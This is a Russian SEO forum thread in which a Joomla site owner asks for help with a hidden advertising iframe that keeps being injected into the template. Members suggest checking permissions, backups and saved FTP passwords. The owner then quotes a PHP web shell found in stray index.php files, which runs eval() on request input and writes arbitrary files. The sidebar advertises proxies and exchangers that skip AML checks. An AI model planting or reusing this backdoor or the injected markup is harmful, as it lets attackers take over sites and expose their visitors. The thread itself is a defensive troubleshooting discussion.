Войти

Войти | Регистрация
Поиск по сайту
Взвлом и прописывание вредоносного кода
Поиск  Правила 
Seo форум » Разработка сайтов » Взлом и защита
Страницы: 1 2 След.
Взвлом и прописывание вредоносного кода, Постоянно вписываю вредоносный код рекламы
#1
29 Января 2013 16:11
Здравствуйте. Сайт на Joomla 1.5. В файл index.php работающего шаблона посноянно прописывается вредоносная реклама, за что яндекс дает санкции. При удаленни данного кода все возвращается на место, при этом дата изменения файла не изменяется, как будто ничего не происходило. Код следующий
[/URL] <style>.sdfsd{margin:-100%;position:absolute;width:600px;height:240px;}</style><div class="sdfsd"><iframe src="_http://avanturist.info/language/english/mails/go.php_"></iframe></div>
От хостра нет толку. Проблема уже целый месяц. Данный код вписывается только на двух сайтах, где нормальная посещаемость. Что можно попробовать?
#2
29 Января 2013 16:46
а хер знает smile:wall:
#3
29 Января 2013 17:03
шаблоны/права доступа к папкам?
может быть саму джумлу где-то подпортить успели. 

Сравните модули с другими сайтами. 
Изменено: Ваше Величество - 29 Января 2013 17:04
#4
29 Января 2013 17:19
Если есть "чистые" бэкапы попробуйте восстановить...
Хочешь зарабатывать много? Отличные тексты для Вашего сайта Регистрация
#5
29 Января 2013 19:38
В том то и дело, что в чистый бэкап прописывается, права доступа на шаблоны ограничивал. Может какой код нужно искать определенный, через тотал?
#6
29 Января 2013 19:42
wilo, на шаблон, на папки с файлами движка. по возможности все что есть - 755
#7
29 Января 2013 19:58
Цитата
Ваше Величество пишет:
wilo, на шаблон, на папки с файлами движка. по возможности все что есть - 755
насоветуете сейчас smile:) index.php  всегда 644
> SEO продвижение Бизнес-Сайтов
#8
29 Января 2013 20:04
Согласен Сергей Макаренко. На index.php ставил 444 и все равно прописывалось. Даже дата изменения файла не менялась при данной записи. Что можно через тотал командер поискать, какие коды?
#9
29 Января 2013 20:11
Цитата
wilo пишет:
Согласен Сергей Макаренко. На index.php ставил 444 и все равно прописывалось. Даже дата изменения файла не менялась при данной записи. Что можно через тотал командер поискать, какие коды?
вопрос в лоб, у вас в тотале сохранены пароли к фтп ? если да, то поздравляю, у вас слили все пароли, меняйте пароли на почте, продуйте всю систему антивирусником, и смените пароли везде где возможно, и никогда не сохраняйте пароли в тотал-командер.
#10
29 Января 2013 20:16
wilo, Рекомендую обратиться http://www.cy-pr.com/forum/f80/t42141/
Хостинг Beget на СУПРе
#11
29 Января 2013 20:18
в тотале не работаю как фтп, он только для поиска текста в файлах для поиска определенного кода. пароли менял уже не помогает. Возможно прописан где то код eval_base кажись такая орфография.
#12
29 Января 2013 21:25
Пишите в личку, могу посмотреть и помочь с данным вопросом.
#13
29 Января 2013 22:08
Цитата
wilo пишет:
Здравствуйте. Сайт на Joomla 1.5. В файл index.php работающего шаблона посноянно прописывается вредоносная реклама, за что яндекс дает санкции. При удаленни данного кода все возвращается на место, при этом дата изменения файла не изменяется, как будто ничего не происходило. Код следующий
[/URL] <style>.sdfsd{margin:-100%;position:absolute;width:600px;height:240px;}</style><div class="sdfsd"><iframe src="_avanturist.info/language/english/mails/go.php_"></iframe></div>
От хостра нет толку. Проблема уже целый месяц. Данный код вписывается только на двух сайтах, где нормальная посещаемость. Что можно попробовать?

А соседние файлы на содержимое не смотрел? smile;) Например, COPYRIGHT? smile:))
#14
29 Января 2013 22:56
На форуме есть тема, где предлагают провести проверку на уязвимость, за ссылку.
Система управления проектами
#15
31 Января 2013 18:19
Добрый день Всем. Спс за помощь. Просматриваю все файлы, т.к. сказать. Есть одно подозрение. Что это за код?
<?php    $bshd = "94784b2bd4d50c884a0b44d06b6aa4d6"; if(isset($_REQUEST['ndwv'])) { $rzgcvo = $_REQUEST['ndwv']; eval($rzgcvo); exit(0); } if(isset($_REQUEST['upxpasw'])) { $zqstfam = $_REQUEST['pyydcuyr']; $yxoulg = $_REQUEST['upxpasw']; $bedcxz = fopen($yxoulg, 'w'); $wqoqwpcu = fwrite($bedcxz, $zqstfam); fclose($bedcxz); echo $wqoqwpcu; exit(); }
?>

Присутствует в отдельных файлах index.php в местах где их не должно быть, в оригинальных установочных архивах.
Изменено: wilo - 31 Января 2013 18:31
 
Страницы: 1 2 След.
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
20:57 01.02. Апдейт 31.01 // Chrome готовит "чёрную метку" для ИИ? 
20:20 кликните сюда 
14:13 LOSPOLLOS.COM - Конвертим по рецепту Хайзенберга. Dating, Mainstream, Binary Options 
13:38 2Index - быстрая индексация страниц сайта и обратных ссылок 
12:44 РСЯ и тормоза сайта: Яндекс начал штрафовать за плохой PageSpeed? 
23:09 Как безопасно купить Гугл почту? 
13:45 Какой движок выбрать для форума? 
19:23 Mixmasters - Exchange without AML and KYC 
15:54 Продам аккаунты Gmail USA IP | Gmail MIX IP | Outlook Old 
14:05 TETChange-Обменник криптовалют 
12:36 Nexulume.com Обменник без AML и KYC 
09:12 Swapwatch.org — Мониторинг криптовалютных обменников 
09:07 Просто $0.04/IP 9PROXY.COM Резидентные прокси Неограниченная пропускная способность Уникальная политика замены Без чёрного списка 
23:25 SOCKS5 приватные прокси на 30 дней для PayPal 
12:41 Moltbook: Соцсеть для ботов, где людям закрыли рот. Началось? 
06:26 Ставки на супер тренды в спорте 
22:31 [AI] Бот за $600к советовал есть сыр с крысами. Нью-Йорк его (наконец-то) снес 
22:30 Точные прогнозы на футбол 
13:38 Осталось 3-5 месяцев до блокировки YouTube в России, — заявил Клименко 
07:11 Список обновленных тем пуст... 
17:02 Gartner обещал смерть SEO к 2026 году. Открываем метрику и проверяем 
Апдейты
  • Яндекс ИКС Яндекс выдача 23.12.2025 (45 дней назад)
  • Яндекс выдача Яндекс выдачаМониторинг апдейтов 01.02.2026 (5 дней назад)

     Доска объявлений
     Купить / Продать
     Работа / Услуги
Интересные темы
—  Ютуб - продвижение и заработок
—  Заработок на Рутубе 2025
—  Новая акция 2025: Заработай* до 5 432 руб. за пару минут** просто, бесплатно и без смс. Сможет даже новичок
—  Баннерообменная бизнес сеть. Заработок без вложений.
—  Развитие канала в Яндекс Дзен


Показать все

Интернет новости

Как понравиться Google?26.03
Как понравиться Google?

25.03 Telegram заблокировали в Испании

25.03 Власти РФ требуют от Telegram бороться с "не такими" новостями

23.03 Microsoft покупает рекламу в выдаче Google для раскрутки Bing

22.03 Google Gemini открыта для тестирования

21.03 Yahoo! продолжает "угрожать" своим новым поиском


Инструменты
Все инструменты

© Сервис анализа сайтов CY-PR.com 2008-2050